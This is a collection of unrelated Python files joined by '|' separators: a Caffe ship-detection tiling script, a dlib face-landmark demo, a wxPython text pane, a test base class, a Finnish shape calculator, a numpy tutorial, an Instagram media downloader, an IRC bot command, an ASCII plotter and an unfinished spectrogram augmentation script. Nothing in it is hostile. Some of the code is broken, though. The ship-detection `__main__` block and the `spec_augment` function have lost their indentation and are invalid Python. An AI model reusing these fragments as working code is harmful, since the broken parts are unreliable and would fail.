            # NOTE(review): tiles are named with the unshifted i/j while the crop
            # uses the shifted xoff/yoff -- confirm downstream offset handling
            tempName = tName + "_" + str(i) + "_" + str(j) + ".jpg"
            print("spliting up " + tempName)
            with timeout(6):
                # 16-bit imagery is range-scaled down to 8-bit for JPEG output
                if bitSize == 16:
                    transStr = "/home/trbatcha/tools/bin/gdal_translate -of JPEG -ot Byte -scale 64 1024 0 255 -b 1 -srcwin " + str(xoff) + " " + str(yoff) + \
                        " " + str(splitSize) + " " + str(splitSize) + " " + fname + " " + tempName
                else:
                    transStr = "/home/trbatcha/tools/bin/gdal_translate -of JPEG -ot Byte -b 1 -srcwin " + str(xoff) + " " + str(yoff) + \
                        " " + str(splitSize) + " " + str(splitSize) + " " + fname + " " + tempName
                #result = subprocess.check_output([transStr], shell=True)
                args = shlex.split(transStr)
                p = Popen(args, stdout=PIPE, stderr=PIPE)
                try:
                    print("calling gdal_translate")
                    stdout, stderr = p.communicate()
                    print("gdal_translate complete")
                    fileList.append(tempName)
                    print (stderr)
                    print (stdout)
                    sys.stdout.flush()
                except IOError, e:
                    # errno is imported at module level later in this file
                    if e.errno != errno.EINTR:
                        raise e
                # NOTE(review): this message prints for every tile, not only after
                # a timeout -- confirm whether it belongs inside the except branch
                print("Timeout: gdal_translate for image " + \
                    tempName + " w {0} h {1}".
                    format(width, height))
                #get rid of xml file gdal_translate creates
                xmlfile = tempName + ".aux.xml"
                if os.path.exists(xmlfile):
                    os.remove(tempName + ".aux.xml")
    return fileList
def doWriteToHDFS(dirname, fname) :
    """Copy a local file into HDFS under dirname and return its HDFS path."""
    basename = os.path.basename(fname)
    hname = os.path.join(dirname, basename)
    # Shell out to the hdfs CLI; stderr is printed for diagnostics only
    put = Popen(["hdfs", "dfs", "-put", fname, hname],
                stdout=PIPE, stderr = PIPE)
    stdout, stderr = put.communicate()
    print stderr
    return hname
import signal, errno
from contextlib import contextmanager
@contextmanager
def timeout(seconds):
    """
    Bound the wrapped block to roughly `seconds` seconds using SIGALRM.

    The handler is deliberately a no-op: the alarm merely interrupts any
    blocking syscall inside the block (which then fails with EINTR) rather
    than raising an exception from here.
    """
    def timeout_handler(signum, frame):
        # Intentionally empty -- see docstring
        pass
    orig_handler = signal.signal(signal.SIGALRM, timeout_handler)
    try:
        signal.alarm(seconds)
        yield
    finally:
        # Cancel any pending alarm and restore the previous handler
        signal.alarm(0)
        signal.signal(signal.SIGALRM, orig_handler)
if __name__ == '__main__':
#debug profiling
import cProfile
save_stdout = sys.stdout
sys.stdout = sys.stderr
#debug force stdout to flush optut
sys.stdout = os.fdopen(sys.stdout.fileno(), "w", 0)
#debug profiling
#profile = cProfile.Profile()
#profile.enable()
cfg.TEST.HAS_RPN = True # Use RPN for proposals
args = parse_args()
if args.cfg_file is not None:
print("using config " + args.cfg_file)
cfg_from_file(args.cfg_file)
if cfg.TRAIN.IS_COLOR == True:
print("We are configured for color")
else:
print("We are configured for b/w")
if args.split_size:
print("We are to split up image by {0}".format(args.split_size))
else:
print("No split applied.")
tiledir = args.tile_path
ifile = args.file
prototxt = os.path.join(cfg.ROOT_DIR, 'models', 'VGG_CNN_M_1024',
'faster_rcnn_end2end', 'test_ships.prototxt')
#caffemodel = os.path.join(cfg.ROOT_DIR, 'output', 'faster_rcnn_end2end',
# 'ak47_train', 'zf_faster_rcnn_iter_70000.caffemodel')
caffemodel = os.path.join(cfg.ROOT_DIR, 'output', 'faster_rcnn_end2end',
'ships_train', 'vgg_cnn_m_1024_faster_rcnn_iter_500000.caffemodel')
if args.model_file is not None:
caffemodel = args.model_file
if args.proto_file is not None:
prototxt = args.proto_file
if not os.path.isfile(caffemodel):
raise IOError(('{:s} not found.\nDid you train it?'
).format(caffemodel))
if args.cpu_mode:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
cfg.GPU_ID = args.gpu_id
# Need to redirect stdout since we only want to return the results
tempDir = tempfile.mkdtemp(dir = "/dev/shm")
os.chmod(tempDir, 0o777)
#debug
doDetect = True
detects = []
if args.split_size != None:
fileList = split_up_file(ifile, tempDir, args.split_size, -1)
##debug only do the first one
#fileList = split_up_file(ifile, tempDir, args.split_size, 200)
else:
fileList = [ifile]
if doDetect == True:
# debug
net = caffe.Net(prototxt, caffemodel, caffe.TEST)
print '\n\nLoaded network {:s}'.format(caffemodel)
# Warmup on a dummy image
im = 128 * np.ones((300, 500, 1), dtype=np.uint8)
#im = 128 * np.ones((300, 500, 3), dtype=np.uint8)
for i in xrange(2):
_, _= im_detect(net, im)
for nextf in fileList:
print('detection for ' + nextf)
res = demo(net, nextf)
if res != None and len(res) > 0:
print("we have detection results!")
for d in res:
#We have to use ifile instead of nextf since
#all the geo data is gone from nextf
detects.append((d, ifile))
else:
pass
#debug show all detects
print("Printing detects for {0} detections".format(len(detects)))
for d in detects:
print(d[0])
shutil.rmtree(tempDir)
#debug profiling
#profile.disable()
#profile.print_stats(sort='time')
#putting stdout back so we can output the results
sys.stdout.flush()
sys.stdout = save_stdout
# Write out the result to stdout
for d in detects:
print(d[0])
sys.exit(0)
|
# -*- coding: utf-8 -*-
import dlib
import numpy
from skimage import io
from icevisual.Utils import Marker
maker = Marker()
maker.mark("start")
# The original program read the model path from sys.argv; this trimmed-down
# version hard-codes the path instead
predictor_path = "./model/shape_predictor_68_face_landmarks.dat"
# The original program took a directory from sys.argv and processed every image
# in it; here a single image path is hard-coded, so each run handles one picture
faces_path = "./faces/alot.jpg"
# As in the face-detection example, use dlib's bundled frontal_face_detector
detector = dlib.get_frontal_face_detector()
# Build the landmark predictor from the official pre-trained model
predictor = dlib.shape_predictor(predictor_path)
maker.mark("image_window")
# Use the image window provided by dlib
win = dlib.image_window()
# Read the image with skimage's io module
img = io.imread(faces_path)
# Draw the image
win.clear_overlay()
win.set_image(img)
maker.mark("before_detector")
# Run the detector; dets holds the face rectangles
dets = detector(img, 1)
maker.mark("after_detector")
maker.distance("start", "image_window")
maker.distance("image_window", "before_detector")
maker.distance("before_detector", "after_detector")
# The number of elements in dets is the number of faces found
print("Number of faces detected: {}".format(len(dets)))
# enumerate yields each detection with its index k (the face number)
# left/right: distance of the face's left/right edge from the image's left edge
# top/bottom: distance of the face's top/bottom edge from the image's top edge
for k, d in enumerate(dets):
    print("dets{}".format(d))
    print("Detection {}: Left: {} Top: {} Right: {} Bottom: {}".format(
        k, d.left(), d.top(), d.right(), d.bottom()))
    maker.mark("before_predictor")
    # Run the predictor on this face; shape holds the 68 landmarks
    shape = predictor(img, d)
    maker.mark("after_predictor")
    maker.distance("before_predictor", "after_predictor")
    # Coordinates of the first two landmarks (relative to the image, not the face box)
    print("Part 0: {}, Part 1: {} ...".format(shape.part(0), shape.part(1)))
    # Draw the landmarks
    win.add_overlay(shape)
# Draw the face rectangles
win.add_overlay(dets)
# Alternative accessors (single-face example below)
# get_landmarks() converts an image into a 68x2 matrix; each row holds the
# x, y coordinates of one landmark within the input image.
def get_landmarks(im):
    """Return a 68x2 matrix of (x, y) landmark coordinates for the first detected face."""
    detections = detector(im, 1)
    landmark_points = predictor(im, detections[0]).parts()
    return numpy.matrix([[point.x, point.y] for point in landmark_points])
# Example of handling multiple faces
def get_landmarks_m(im):
    """
    Mark the 68 facial landmarks of every detected face directly in the image.

    Args:
        im: Image array as returned by skimage.io.imread (rows are y, columns x)

    Returns:
        The same image array, with each landmark pixel painted orange-red.
    """
    dets = detector(im, 1)
    # Number of faces found
    print("Number of faces detected: {}".format(len(dets)))
    for face_index in range(len(dets)):
        # BUG FIX: the original used `np.array`, but this module imports the
        # package as `numpy`, so it raised NameError at runtime.
        facepoint = numpy.array([[p.x, p.y] for p in predictor(im, dets[face_index]).parts()])
        # Inner loop no longer reuses the outer loop's variable name
        for point_index in range(68):
            # Paint the landmark pixel (row index is y, column index is x)
            im[facepoint[point_index][1]][facepoint[point_index][0]] = [232, 28, 8]
    return im
# Print the landmark matrix
print("face_landmark:")
print(get_landmarks(img))
# Wait for the user to press enter before exiting
dlib.hit_enter_to_continue()
import wx
import wx.richtext as rtc
import prefs
import re
from utility import platform
from theme import Theme
class BasePane(rtc.RichTextCtrl):
    """Shared rich-text pane for a connection, themed and wired for X11-style copy/paste."""
    def __init__(self, parent, connection, style):
        # NOTE(review): `style` is passed positionally, so wx receives it as the
        # `id` argument rather than `style` -- confirm whether style= was intended
        rtc.RichTextCtrl.__init__(self, parent, style)
        self.connection = connection
        self.cols = 0
        self.rows = 0
        self.basic_style = None
        self.theme = Theme.fetch()
        self.fg_colour = self.theme.get('foreground')
        self.bg_colour = self.theme.get('background')
        self.is_dragging = False
        self.Clear()
        self.restyle_thyself()
        self.Bind(wx.EVT_MIDDLE_DOWN , self.paste_with_middle_mouse )
        self.Bind(wx.EVT_LEFT_UP , self.left_mouse_up)
        self.Bind(wx.EVT_LEFT_DOWN , self.left_mouse_down)
        self.Bind(wx.EVT_MOTION , self.mouse_moved)
    # reinventing xmouse, one event at a time.
    def mouse_moved(self, evt):
        # Track drag state so left_mouse_up can tell a drag-select from a click
        self.is_dragging = evt.Dragging()
        evt.Skip(True)
    def left_mouse_up(self, evt):
        # Finishing a drag-selection copies it, X11 primary-selection style
        if self.is_dragging:
            self.is_dragging = False
            if prefs.get('use_x_copy_paste'):
                if platform == 'linux': wx.TheClipboard.UsePrimarySelection(True)
                if self.CanCopy(): self.Copy()
                if platform == 'linux': wx.TheClipboard.UsePrimarySelection(False)
        evt.Skip(True)
    # treat selectin in input/output as mutually exclusive
    def left_mouse_down(self, evt):
        # Clicking one pane clears the selection in the other
        for pane in (self.connection.output_pane, self.connection.input_pane):
            if not self == pane:
                pane.SelectNone()
        evt.Skip(True)
    def paste_with_middle_mouse(self,evt):
        # Middle-click paste, X11 style, always into the input pane
        if prefs.get('use_x_copy_paste'): self.connection.input_pane.paste_from_selection()
    def restyle_thyself(self):
        """Re-apply theme colours, font, and margins to the control."""
        basic_style = rtc.RichTextAttr()
        # NOTE(review): the theme is re-fetched here but self.fg_colour and
        # self.bg_colour are not refreshed from it -- confirm whether a theme
        # change should take effect without recreating the pane
        self.theme = Theme.fetch()
        basic_style.SetTextColour (self.fg_colour)
        basic_style.SetBackgroundColour(self.bg_colour)
        self.SetBackgroundColour(self.bg_colour)
        self.SetBasicStyle(basic_style)
        self.basic_style = basic_style
        font = wx.Font(prefs.get('font'))
        self.SetFont(font)
        # set one-half character's worth of left / top margin
        font_width, font_height = self.font_size()
        # Apparently Centos' Wx doesn't have this, so commenting it out.
        #self.SetMargins((font_width / 2, -1))
        self.update_size()
    def font_size(self):
        """Return (width, height) in pixels of one 'M' in the current font."""
        font = self.GetFont()
        # suss out how big one character is
        dc = wx.ScreenDC()
        dc.SetFont(font)
        return dc.GetTextExtent('M')
    #### override in subclasses
    def check_for_interesting_keystrokes(self, evt):
        # Subclass hook: the base pane ignores keystrokes
        pass
    def update_size(self, evt = None):
        # Subclass hook: recompute rows/cols on resize; base pane does nothing
        pass
|
# -*- coding:utf-8 -*-
import unittest
from config import application, database, environment
import view
class ViewTestBase(unittest.TestCase):
    """Base TestCase that configures the app for the 'test' environment and provides a test client."""
    def setUp(self):
        app = application.app
        environment.configure('test')
        database.configure()
        view.register()
        # model is imported here, after configuration -- presumably so model
        # setup sees the test environment; confirm before moving to module level
        import model
        model.reset()
        self.app = app.test_client()
|
from math import pi
def valikko():
    """Interactive menu loop: compute perimeter and area of a square (n), rectangle (s), or circle (y); q quits."""
    while True:
        vastaus = (input("Syötä kuvion alkukirjain, q lopettaa (n/s/y/q): "))
        if vastaus == "n":
            # Square: one side length, re-prompted until positive
            line = "Syötä neliön sivun pituus: "
            nsivu = float(input(line))
            mitta = tarkista(nsivu, line)
            npiiri, nala = laske_neliö(mitta)
            print("Ympärysmitta on {:.2f}".format(npiiri))
            print("Pinta-ala on {:.2f}".format(nala))
        elif vastaus == "s":
            # Rectangle: two side lengths, each validated separately
            line = "Syötä suorakaiteen sivun 1 pituus: "
            ssivu1 = float(input(line))
            mitta1 = tarkista(ssivu1, line)
            line = "Syötä suorakaiteen sivun 2 pituus: "
            ssivu2 = float(input(line))
            mitta2 = tarkista(ssivu2, line)
            spiiri, sala = laske_suorakaide(mitta1, mitta2)
            print("Ympärysmitta on {:.2f}".format(spiiri))
            print("Pinta-ala on {:.2f}".format(sala))
        elif vastaus == "y":
            # Circle: radius
            line = "Syötä ympyrän säde: "
            säde = float(input(line))
            mitta = tarkista(säde, line)
            ypiiri, yala = laske_ympyrä(mitta)
            print("Ympärysmitta on {:.2f}".format(ypiiri))
            print("Pinta-ala on {:.2f}".format(yala))
        elif vastaus == "q":
            return
        else:
            # Unrecognized choice: tell the user and loop again
            print("Virheellinen syöte, yritä uudelleen!")
        print()
def laske_ympyrä(mitta):
    """Return the circumference and area of a circle with radius `mitta`."""
    perimeter = 2 * mitta * pi
    area = pi * mitta ** 2
    return perimeter, area
def tarkista(mitta, line):
    """Keep re-prompting with `line` until the measurement is positive, then return it."""
    value = mitta
    while value <= 0:
        value = float(input(line))
    return value
def laske_neliö(mitta):
    """Return the perimeter and area of a square with side length `mitta`."""
    perimeter = mitta * 4
    area = float(mitta * mitta)
    return perimeter, area
def laske_suorakaide(mitta1, mitta2):
    """Return the perimeter and area of a rectangle with the given side lengths."""
    perimeter = float(mitta1 * 2 + mitta2 * 2)
    area = float(mitta1 * mitta2)
    return perimeter, area
def main():
    """Entry point: run the interactive menu loop, then print a farewell."""
    valikko()
    print("Näkemiin!")
main()
#!/usr/bin/env python
# coding: utf-8
# ## Numpy basics
# - numpy: a key package for data science work => matrices (linear algebra)
# - After numpy comes <b style="color:red">pandas</b> for data preprocessing
# <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/NumPy_logo.svg/330px-NumPy_logo.svg.png">
# In[4]:
import numpy as np
# ## 1. Handling numeric data (basics)
# In[5]:
math1 = 89
math2 = 95
math3 = 75
# In[6]:
m_sum = math1 + math2 + math3
m_avg = m_sum / 3
# In[9]:
print("수학 점수의 합계: {}".format(m_sum))
print("수학 점수의 평균: {}".format(m_avg))
# In[10]:
math4 = 87
# In[11]:
m_sum = math1 + math2 + math3 + math4
m_avg = m_sum / 4
# In[12]:
print("수학 점수의 합계: {}".format(m_sum))
print("수학 점수의 평균: {}".format(m_avg))
# ## 2. Working with the list data type
# In[23]:
mlist = [89, 95, 75]
print(mlist)
# In[24]:
m_sum1 = 0
m_avg1 = 0
# In[25]:
# Compute the sum and average with a for loop
for e in mlist :
    m_sum1 += e
m_avg1 = m_sum1 / len(mlist)
print("수학 점수의 합계: {}".format(m_sum1))
print("수학 점수의 평균: {}".format(m_avg1))
# In[26]:
mlist.append(87)
print(mlist)
# In[28]:
m_sum1 = 0
m_avg1 = 0
# In[29]:
# Compute the sum and average with a for loop
for e in mlist :
    m_sum1 += e
m_avg1 = m_sum1 / len(mlist)
print("수학 점수의 합계: {}".format(m_sum1))
print("수학 점수의 평균: {}".format(m_avg1))
# In[ ]:
|
import logging
import os
import sys
import json
import time
from contextlib import contextmanager
import requests
from colorama import (Fore, Back, Style)
from tqdm import tqdm
from instascrape.utils import to_datetime
from instascrape.constants import UA
from instascrape.exceptions import InstaScrapeError
logger = logging.getLogger("instascrape")
@contextmanager
def progress(total: int = None, desc: str = None, ascii: bool = True, disable: bool = False):
    """Context manager yielding a tqdm progress bar, or a silent dummy.

    The bar is hidden when ``disable`` is set or when the level of
    ``logger.handlers[1]`` is below INFO (20) or at/above ERROR (40) —
    presumably the console handler; TODO confirm the handler index is stable.
    On clean exit the badge switches to 'Completed'; on any exception
    (including Ctrl-C) to 'Failed'; the bar is always closed.
    """
    hide = disable or logger.handlers[1].level < 20 or logger.handlers[1].level >= 40
    if hide:
        class Dummy:
            # Absorbs every attribute access / call so callers need no branching.
            def dummy(self, *args, **kwargs):
                pass
            def __getattr__(self, item):
                return self.dummy
        bar = Dummy()
    else:
        # \033[7m = reverse video for the custom badge; colorama resets afterwards.
        bar = tqdm(total=total, file=sys.stdout, unit="item", ascii=ascii, dynamic_ncols=True,
                   desc=("\033[7m" + "[" + desc.center(11) + "]" + Style.RESET_ALL) if desc else (Back.YELLOW + Fore.BLACK + "[" + "Downloading".center(11) + "]" + Style.RESET_ALL),
                   bar_format="{desc} {percentage:3.0f}%|{bar}| {n_fmt}/{total_fmt} " + Fore.LIGHTBLACK_EX + "[{elapsed}<{remaining}{postfix}]" + Fore.RESET)
    try:
        yield bar
    except (Exception, KeyboardInterrupt):
        bar.set_description_str(Back.RED + Fore.BLACK + "[" + "Failed".center(11) + "]" + Style.RESET_ALL)
        raise
    else:
        bar.set_description_str(Back.GREEN + Fore.BLACK + "[" + "Completed".center(11) + "]" + Style.RESET_ALL)
    finally:
        bar.close()
def _down_from_src(src: str, filename: str, path: str = None) -> str or None:
    """Low-level function to download media from a URL (`src`).

    * Called in `download_user_profile_pic`.
    * Only downloads mp4 and jpeg (extension chosen from the Content-Type header).
    * Streams to ``<filename>.<ext>.part`` and renames on success, so an
      interrupted download never leaves a file with the final name.

    Arguments:
        src: source of media (URL)
        filename: filename of the file (without extension)
        path: full path to the download destination directory

    Returns:
        path: full path to the destination *directory* (not the file),
              or None if any error occurred (errors are logged, not raised)
    """
    path = path or "./"
    path = os.path.abspath(path)
    if not os.path.isdir(path):
        os.mkdir(path)
    f = None
    try:
        r = requests.get(src, stream=True, headers={"user-agent": UA})
        r.raise_for_status()
        # Get info of the file
        mime = r.headers["Content-Type"]
        size = r.headers["Content-Length"]
        size_in_kb = int(int(size) / 1000)
        if mime == "video/mp4":
            ext = ".mp4"
        elif mime == "image/jpeg":
            ext = ".jpg"
        else:
            raise InstaScrapeError("Invalid MIME type: {0}.".format(mime))
        finish_filename = filename + ext
        part_filename = filename + ext + ".part"
        # Download in 1 KiB chunks to keep memory flat.
        logger.debug("=> [{0}] {1} ({2} kB)".format(finish_filename, mime, size_in_kb))
        f = open(os.path.join(path, part_filename), "wb+")
        for chunk in r.iter_content(1024):
            if chunk:
                f.write(chunk)
    except Exception as e:
        # Best-effort: log and signal failure; the early return skips the rename below.
        logger.error("Download Error (src: '{0}'): ".format(src) + str(e))
        return None
    finally:
        if f:
            f.close()
    # rename .part file to its real extension (only reached on success)
    os.rename(os.path.join(path, part_filename), os.path.join(path, finish_filename))
    return path
def _down_structure(structure, dest: str = None, directory: str = None, subdir: str = None, force_subdir: bool = False) -> (str, tuple):
    """Download media of containers of a single structure to `dest`. May deecorate the proccess with progress bar.

    - If there is multiple media in the structure, a sub directory will be created to store the media.
    * This function calls `down_from_src` function and wraps it with some interactions with Post object to support downloading post.
    * Containers are obtained by calling `structure.obtain_media()`.
    * Called in `download_story` and `download_post` individualy.
    * If a file with the same path and filename found, it will skip the download process.

    [dest]
        [directory]
            [sub directory] (multi or dump_metadata=True)
                [file]
                ...

    Arguments:
        structure: a structure object that has attrubute `obtain_media()` (`Post` or `Story`)
        dest: destination path, one will be created if directory not found (must be a directory)
        directory: make a new directory inside `dest` to store all files
        subdir: name of the sub directory which is created when downloading multiple media
        force_subdir: force create a sub directory and store all the media (used when dump_metadata=True)

    Returns:
        str: full path to the download destination
        tuple: (downs, exists)
    """
    dest = dest or "./"
    path = os.path.abspath(dest)
    if not os.path.isdir(path):
        logger.debug("{0} directory not found. Creating one...".format(path))
        os.mkdir(path)
    if directory:
        path = os.path.join(path, directory)
        if not os.path.isdir(path):
            os.mkdir(path)
    # Remember the directory level that is reported back to the caller;
    # `path` may descend one more level into the sub directory below.
    return_path = path
    containers = structure.obtain_media()
    multi = len(containers) > 1
    if multi or force_subdir:
        if subdir:
            # create a sub directory for multiple media of a post
            path = os.path.join(path, subdir)
            if not os.path.isdir(path):
                os.mkdir(path)
    logger.debug("Downloading {0} ({1} media) [{2}]...".format(subdir or directory, len(containers), structure.typename))
    logger.debug("Path: " + path)
    downs = exists = 0
    with progress(len(containers), disable=False) as bar:
        for i, c in enumerate(containers, start=1):
            bar.set_postfix_str(c.typename)
            if multi:
                # Numbered filenames inside the sub directory.
                filename = str(i)
            else:
                filename = subdir or str(i)
            if structure.__class__.__name__ in ("Story", "Highlight"):
                # * exclusively and explictly change filename to datetime string for Story and Highlight
                filename = to_datetime(structure.created_time_list[i-1])
            # check if the file / directory already exists (either media type)
            if os.path.isfile(os.path.join(path, filename + ".jpg")) or os.path.isfile(os.path.join(path, filename + ".mp4")):
                exists += 1
                logger.debug("file already downloaded, skipped !")
                bar.set_description_str(Back.BLUE + Fore.BLACK + "[" + "Exists".center(11) + "]" + Style.RESET_ALL)
                time.sleep(0.1)  # give some time for displaying the 'Exists' badge of the progress bar
            else:
                # download; `state` is None on failure (already logged)
                state = _down_from_src(c.src, filename, path)
                if state:
                    downs += 1
            bar.update(1)
    return return_path, (downs, exists)
def _down_posts(posts, dest: str = None, directory: str = None, dump_metadata: bool = False):
    """High-level function for downloading media of a list of posts. Decorates the process with tqdm progress bar.

    * This function calls `down_structure` function and wraps it with 'for' loop & progress bar to support downloading multiple posts.

    Arguments:
        posts: a generator which generates `Post` instances or a list that contains preloaded `Post` instances
        dest: download destination (should be a directory)
        directory: make a new directory inside `dest` to store all the files
        dump_metadata: (force create a sub directory of the post and) dump metadata of each post to a file inside if True

    Returns:
        path: full path to the download destination, or None if nothing was processed
    """
    # A generator has no len(); totals are only known for preloaded lists.
    is_preloaded = isinstance(posts, list)
    path = None
    total = len(posts) if is_preloaded else None
    logger.info("Downloading {0} posts {1}...".format(total or "(?)", "with " + str(sum([len(x) for x in posts])) + " media in total" if is_preloaded else ""))
    downs = exists = 0
    # prepare progress bar, hide progress bar when quiet and show download details when debugging
    with progress(total=total, desc="Processing", ascii=False) as bar:
        for i, p in enumerate(posts, start=1):
            bar.set_postfix_str("(" + (p.shortcode if len(p.shortcode) <= 11 else p.shortcode[:8] + "...") + ") " + p.typename)
            logger.debug("Downloading {0} of {1} posts...".format(i, total or "(?)"))
            # download; sub directory named <datetime>_<shortcode>
            subdir = to_datetime(p.created_time) + "_" + p.shortcode
            # NOTE: force_subdir if dump_metadata ?
            path, (d, e) = _down_structure(p, dest, directory, subdir, force_subdir=False)  # `subdir` can also be the filename if the post has only one media
            # dump metadata
            if dump_metadata:
                filename = subdir + ".json"
                metadata_file = os.path.join(path, filename)  # path inside the sub directory
                logger.debug("-> [{0}] dump metadata".format(filename))
                with open(metadata_file, "w+") as f:
                    json.dump(p.as_dict(), f, indent=4)
            # calculate total
            downs += d
            exists += e
            bar.update(1)
    logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
    if path:  # path is None if error occurred in `_down_structure()`
        logger.info("Destination: {0}".format(path))
    return path
def _down_highlights(highlights, dest: str = None, directory: str = None):
    """Download all media of a list (or generator) of Highlight structures.

    Mirrors `_down_posts` but names each sub directory after the highlight
    title (with '/' sanitised) and always forces a sub directory.
    Returns the destination path, or None if nothing was processed.
    """
    is_preloaded = isinstance(highlights, list)
    path = None
    total = len(highlights) if is_preloaded else None
    logger.info("Downloading {0} highlights {1}...".format(total or "(?)", "with " + str(sum([len(x) for x in highlights])) + " media in total" if is_preloaded else ""))
    downs = exists = 0
    # prepare progress bar, hide progress bar when quiet and show download details when debugging
    with progress(total=total, desc="Processing", ascii=False) as bar:
        for i, highlight in enumerate(highlights, start=1):
            bar.set_postfix_str("(" + (highlight.title if len(highlight.title) <= 17 else highlight.title[:14] + "...") + ") " + highlight.typename)
            logger.debug("Downloading {0} of {1} highlights...".format(i, total or "(?)"))
            # download into a sub directory named after the title
            subdir = highlight.title
            subdir = subdir.replace("/", "-")  # clean path separators out of the title
            # NOTE: force_subdir if dump_metadata ?
            path, (d, e) = _down_structure(highlight, dest, directory, subdir, force_subdir=True)  # `subdir` can also be the filename if the post has only one media
            # calculate total
            downs += d
            exists += e
            bar.update(1)
    logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
    if path:  # path is None if error occurred in `_down_structure()`
        logger.info("Destination: {0}".format(path))
    return path
def _down_igtv(igtv, dest: str = None, directory: str = None, dump_metadata: bool = False):
    """Download all media of a list (or generator) of IGTV video structures.

    Mirrors `_down_posts`: sub directory per video named after its (sanitised)
    title, optional metadata JSON dump next to the media.
    Returns the destination path, or None if nothing was processed.
    """
    is_preloaded = isinstance(igtv, list)
    path = None
    total = len(igtv) if is_preloaded else None
    logger.info("Downloading {0} IGTV videos...".format(total or "(?)"))
    downs = exists = 0
    # prepare progress bar, hide progress bar when quiet and show download details when debugging
    with progress(total=total, desc="Processing", ascii=False) as bar:
        for i, video in enumerate(igtv, start=1):
            bar.set_postfix_str("(" + (video.title if len(video.title) <= 17 else video.title[:14] + "...") + ") " + video.typename)
            logger.debug("Downloading {0} of {1} IGTV videos...".format(i, total or "(?)"))
            # download into a sub directory named after the title
            subdir = video.title
            subdir = subdir.replace("/", "-")  # clean path separators out of the title
            # NOTE: force_subdir if dump_metadata ?
            path, (d, e) = _down_structure(video, dest, directory, subdir, force_subdir=False)  # `subdir` can also be the filename if the post has only one media
            # dump metadata
            if dump_metadata:
                filename = subdir + ".json"
                metadata_file = os.path.join(path, filename)  # path inside the sub directory
                logger.debug("-> [{0}] dump metadata".format(filename))
                with open(metadata_file, "w+") as f:
                    json.dump(video.as_dict(), f, indent=4)
            # calculate total
            downs += d
            exists += e
            bar.update(1)
    logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
    if path:  # path is None if error occurred in `_down_structure()`
        logger.info("Destination: {0}".format(path))
    return path
|
from mod_base import*
class Die(Command):
    """Kill the bot. Warning: I won't rise from my ashes like a phoenix!"""
    def run(self,win,user,data,caller=None):
        # Announce, then stop the bot's main loop (no restart).
        win.Send("dying...")
        self.bot.StopBot()
# Registration metadata — presumably consumed by the bot's module loader
# (TODO confirm against mod_base).
module = {
    "class": Die,         # handler class instantiated by the loader
    "type": MOD_COMMAND,  # registered as a chat command
    "level": 5,           # required privilege level to invoke
    "zone":IRC_ZONE_BOTH  # active in both channel and private zones
}
|
import sys
import re
def plot(X, Y):
    """Print an 11x11 ASCII scatter plot of the points zip(X, Y).

    Coordinates must be integers in [0, 10]; origin is bottom-left.
    Axis labels are printed on the left (y) and bottom (x) edges.
    """
    # Row 0 of the grid is y=10 (top of the printed output).
    grid = [['.' for _ in range(11)] for _ in range(11)]
    for x, y in zip(X, Y):
        grid[10 - y][x] = 'x'
    # print() calls with a single argument are valid in both Python 2 and 3;
    # the original used Python-2-only print statements and xrange.
    print('10 ' + ' '.join(grid[0]))
    for y in range(9, -1, -1):
        print(' ' + str(y) + ' ' + ' '.join(grid[10 - y]))
    print(' ' + ' '.join(str(i) for i in range(11)))
def process(line):
    """Extract all "(x,y)" integer pairs from `line`, print the raw pairs,
    and render them with plot()."""
    points = re.findall(r'\((\d+),(\d+)\)', line)
    xs = [int(p[0]) for p in points]
    ys = [int(p[1]) for p in points]
    # print() with one argument works in Python 2 and 3 alike; the original
    # used a Python-2-only print statement.
    print(points)
    plot(xs, ys)
# Plot every line of the input file named on the command line,
# printing a 1-based line counter before each plot.
with open(sys.argv[1]) as f:
    for i, line in enumerate(f, start=1):
        print(i)
        process(line)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
import os
from scipy import signal
from matplotlib.colors import LogNorm
from PIL import Image
import tensorflow_io as tfio
import random
random.seed(111)
def spec_augment(spec: np.ndarray, num_mask=2,
freq_masking_max_percentage=0.1, time_masking_max_percentage=0.1):
spec = spec.copy()
for i in range(num_mask):
all_frames_num, all_freqs_num = spec.shape
freq_percentage = random.uniform(0.0, freq_masking_max_percentage)
num_freqs_to_mask = int(freq_percentage * all_freqs_num)
f0 = np.random.uniform(low=0.0, high=all_freqs_num - num_freqs_to_mask)
f0 = int(f0)
spec[:, f0:f0 + num_freqs_to_mask] = 0
time_percentage = random.uniform(0.0, time_masking_max_percentage)
num_frames_to_mask = int(time_percentage * all_frames_num)
t0 = np.random.uniform(low=0.0, high=all_frames_num - num_frames_to_mask)
t0 = int(t0)
spec[t0:t0 + num_frames_to_mask, :] = 0
return spec
# Batch job: for every class folder under ../classes, render a spectrogram PNG
# per <n>.png/<n>.csv pair into <class>/spectro/, plus three SpecAugment
# variants into <class>/spectro/augment/.
classes = os.listdir('../classes')
for classe in classes :
    files = os.listdir("../classes/"+classe)
    if not os.path.exists("../classes/"+classe+'/spectro'):
        os.makedirs("../classes/"+classe+'/spectro')
    for img in files :
        if not os.path.exists("../classes/"+classe+'/spectro/augment/'):
            os.makedirs("../classes/"+classe+'/spectro/augment/')
        try :
            print(classe)
            # Image name doubles as the CSV index; non-numeric names fail here
            # and are swallowed by the except below.
            nb_img =int(img.replace(".png",""))
            print(nb_img)
            # NOTE(review): CSV is read from the CWD, not the class folder, and
            # the column really is spelled "engergy" — confirm both.
            ts = np.array(pd.read_csv(str(nb_img)+".csv")["engergy"])
            fs = 10e12
            #powerSpectrum, freqenciesFound, time, imageAxis = plt.specgram(ts, Fs=fs)
            """"plt.gca().set_axis_off()
            plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
            hspace = 0, wspace = 0)
            plt.margins(0,0)
            plt.gca().xaxis.set_major_locator(plt.NullLocator())
            plt.gca().yaxis.set_major_locator(plt.NullLocator())
            plt.savefig("../classes/"+classe+'/spectro/'+str(nb_img)+".png",frameon='false')"""
            f, t, s = signal.spectrogram(ts,fs,noverlap=int(len(ts)/8)-1,nperseg=int(len(ts)/8) )
            plt.figure()
            # Log-power display; axes and margins stripped so only pixels remain.
            plt.imshow(10*np.log(s),aspect= 'auto')
            plt.gca().set_axis_off()
            plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
                hspace = 0, wspace = 0)
            plt.margins(0,0)
